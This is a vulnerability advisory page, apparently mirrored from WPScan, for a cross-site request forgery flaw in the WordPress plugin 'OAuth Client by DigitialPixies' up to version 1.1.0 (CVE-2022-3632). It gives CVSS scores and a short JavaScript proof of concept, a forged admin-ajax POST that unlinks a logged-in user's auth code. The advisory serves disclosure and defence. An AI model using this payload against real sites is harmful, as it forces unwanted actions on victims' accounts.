Lucene search
Lana CodesWPEX-ID:4C1B0E5E-245A-4D1F-A561-E91AF906E62DHistoryOct 21, 2022 - 12:00 a.m.
OAuth Client by DigitialPixies <= 1.1.0 - CSRF
2022-10-2100:00:00
Lana Codes
53
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions.
Make a logged in user visit a page with the following code
fetch('https://example.com/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=dpt-oauth-ajax&call=unlink_auth_code',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));Related
patchstack
patchstack
wpvulndb
wpvulndb
OAuth Client by DigitialPixies <= 1.1.0 - CSRF
2022-10-21 00:00:00
cve
cve
CVE-2022-3632
2022-11-14 15:15:00
prion
prion
Cross site request forgery (csrf)
2022-11-14 15:15:00
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
Related for WPEX-ID:4C1B0E5E-245A-4D1F-A561-E91AF906E62D